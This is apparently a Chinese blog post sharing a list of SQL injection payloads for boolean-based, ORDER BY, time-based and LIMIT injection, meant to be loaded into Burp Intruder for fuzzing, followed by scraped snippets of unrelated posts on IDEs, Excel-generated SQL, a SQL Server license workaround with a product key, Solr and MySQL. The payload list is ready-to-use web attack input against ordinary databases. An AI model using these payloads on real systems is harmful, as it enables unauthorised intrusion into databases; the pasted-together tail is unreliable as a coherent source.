分享一些平时测试用的sql payloads

1:BOOL SQLINJECTION

\

"
%df‘
%df"
and 1=1
and 1=2
‘ and ‘1‘=‘1
‘ and ‘1‘=‘2
" and "1"="1
" and "1"="2
) and (1=1
) and (1=2
‘) and (‘1‘=‘1
‘) and (‘1‘=‘2
%‘ and 1=1 and ‘%‘=‘
%‘ and 1=2 and ‘%‘=‘x
%‘) and 1=1 and (‘%‘=‘
%‘) and 1=2 and (‘%‘=‘x
OR 1=1
OR 1=2
‘ OR 1=1-- -
‘ OR 1=2-- -
) OR 1=1-- -
) OR 1=2-- -
‘) OR 1=1-- -
‘) OR 1=2-- -
" OR "1"="1
" OR "1"="2
‘ OR ‘1‘=‘1
‘ OR ‘1‘=‘2
) OR (1=1
) OR (1=2
‘) OR (‘1‘=‘1
‘) OR (‘1‘=‘2

2:ORDER BY SQLINJECTION fuzz payload

(case when(1=1) then 1 else (select 1 union select 2) end)
(case when(1=2) then 1 else (select 1 union select 2) end)
,(1-(case when(1=1) then 1 else (select 1 union select 2) end))
,(1-(case when(1=2) then 1 else (select 1 union select 2) end))
,1=if((1=1),1,(select 1 union select 2))
,1=if((1=2),1,(select 1 union select 2))
,If((1=1),1,(select 1 union select 2))-- -
,If((1=2),1,(select 1 union select 2))-- -
,If((1=1),sleep(4),(select 1 union select 2))-- -
-IF((1=1),1,(SELECT 1 UNION SELECT 2))-- -
-IF((1=2),1,(SELECT 1 UNION SELECT 2))-- -
-(case when(1=1) then 1 else (select 1 union select 2) end)
-(case when(1=2) then 1 else (select 1 union select 2) end)

3:TIME-BASE SQLINJECTION

‘%2b(if((1=1 and sleep(4)),1,(select 1 union select 2)))%2b‘a
-IF((1=1),sleep(4),(SELECT 1 UNION SELECT 2))-- -
‘;(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
;SELECT sleep(4)
);SELECT sleep(4)-- -
;SELECT sleep(4)-- -
;(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
‘ AND SLEEP(4)%23
AND sleep(4)
‘ AND sleep(4) AND ‘1‘=‘1
‘) AND sleep(4) AND (‘1‘=‘1
) AND sleep(4) AND (1=1
" AND sleep(4) AND "1"="
‘) and (select(0)from(select(sleep(4)))x)-- -
and (select(0)from(select(sleep(4)))x)
and (select(0)from(select(sleep(4)))x) and 1=1
‘ and (select(0)from(select(sleep(4)))x) and ‘1‘=‘1
" and (select(0)from(select(sleep(4)))x) and "1"="1
) and (select(0)from(select(sleep(4)))x) and (1=1
‘) and (select(0)from(select(sleep(4)))x) and (‘1‘=‘1
rlike (select(0)from(select(sleep(4)))x) and 1=1
‘ rlike (select(0)from(select(sleep(4)))x) and ‘1‘=‘1
) rlike (select(0)from(select(sleep(4)))x) and (1=1
‘) rlike (select(0)from(select(sleep(4)))x) and (‘1‘=‘1
;waitfor delay ‘0:0:4‘ -- -
‘;waitfor delay ‘0:0:4‘ -- -
);waitfor delay ‘0:0:4‘ -- -
‘);waitfor delay ‘0:0:4‘ -- -
if(now()=sysdate(),sleep(4),0)/*‘XOR(if(now()=sysdate(),sleep(4),0))OR‘"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
(SELECT * FROM(SELECT(sleep(4)))lWuP)

4:LIMIT SQLINJECTION 

procedure analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)

用法就不用多说,放burp instuder fuzz 就行了

时间: 2024-09-29 00:50:34

分享一些平时测试用的sql payloads的相关文章

个人分享:平时开发中感觉几款不错 IDE 、插件、工具

本人主业 C# 开发,由于是做 Web 开发,所以像 SQL.JavaScript 这些肯定经常要接触到.当然,平时本人也写过 Node.js.Java.Python之类,不过,这些只能讲简单了解而已. 接下来,分享本人平时经常到的一些 IDE.插件.软件. A  JavaScript( Node.js ).Python .Java 开发利器: WebStorm.PyCharm .IntelliJ IDEA. 业界知名 IDE 公司出品,重点这几款 IDE 功能强大,设计也漂亮.(相比 Ecli

测试用

鼠标移动到小图标上显示大图 测试用,布布扣,bubuko.com

【分享】通过Excel生成批量SQL语句,处理大量数据的好办法

我们经常会遇到这样的要求:用户给发过来一些数据,要我们直接给存放到数据库里面,有的是Insert,有的是Update等等,少量的数据我们可以采取最原始的办法,也就是在SQL里面用Insert into来实现,但是如果有几十条几百条甚至上千条数据的时候继续写单独的SQL语句的话那就惨了,其实有两种简单的方法: 第一,将Excel数据整理好了之后,通过SQL的导入功能直接导进数据库,但是得保证数据库字段和Excel的字段一致. 第二,通过Excel来生成对应的SQL语句,直接将SQL语句复制到分析器

【分享】小工具大智慧之Sql执行工具

工具概况 情况是这样的,以前我们公司有很多Sql用于完成一些很不起眼但又不得不完成的业务,出于方便就直接在Sql查询分析器里执行,按理说应该写一些专门的工具的,但是这些脚本很多,于是我就写了这样一个小工具,只要Sql可以解决的问题就能用到它了,那么它有什么优点呢 一.以前写好的Sql可以不用怎么更改,只需要将参数部分提取出来按照定好的规范改成一个模版即可,使用工具加载模版时,工具会自动将模块要求的参数提供给用户填写. 二.模版文件里可以配置好连接字符串,这样不用每次都连接数据库,也避免连接错误的

测试用WORD发文章

标题1 粗体粗体 标题2 字号改变三号字 正文部分 测试测试测试!!! 代码部分 <html> <body> <?php print 'dsf\'dsfa\'sdfa.'; ?> </body> </html> ? 测试完毕! 测试用WORD发文章

【SQL 问题】试用版SQL Server 2008 R2 提示评估期已过,数据库不能访问解决办法

因为以前一直是试用版,重启服务器之后,突然数据库不能访问,提示评估期已过,都快吓死了.还好找到了解决办法特copy解决步骤如下: (笔者用的是企业版: R88PF-GMCFT-KM2KR-4R7GB-43K4B) 第一步:进入SQL2008配置工具中的安装中心第二步:再进入维护界面,选择版本升级第三步:进入产品密钥,输入密钥第四步:一直点下一步,直到升级完毕.SQL Server 2008 Developer: PTTFM-X467G-P7RH2-3Q6CG-4DMYB SQL Server 2

solr 配置中文分析器/定义业务域/配置DataImport功能(测试用)

一.配置中文分析器    使用IKAnalyzer    配置方法:        1)把IK的jar包添加到solr工程中/WEB-INF/lib目录下        2)把IK的配置文件扩展词典,放到classpath下./WEB-INF/classes目录下        3)在schema.xml中定义FieldType,指定使用IK作为分析器 <!-- IKAnalyzer--> <fieldType name="text_ik" class="s

[case分享]在Azure IaaS VM搭建SQL AlwaysOn出现41131错误

Azure环境:1台 DC+2台SQL 2012(用库中的SQL VM,不是VM自搭建SQL Server) 故障: 在AlwaysOn向导,出现这样的错误信息: Failed to bring availability group 'HADB' online.  The operation timed out. Verify that the local Windows Server Failover Clustering (WSFC) node is online. Then verify

MySQL数据库练习测试用

1.创建student和score表 CREATE TABLE student ( id INT(10) NOT NULL UNIQUE PRIMARY KEY , name VARCHAR(20) NOT NULL , sex VARCHAR(4) , birth YEAR, department VARCHAR(20) , address VARCHAR(50) ); 创建score表.SQL代码如下: CREATE TABLE score ( id INT(10) NOT NULL UNI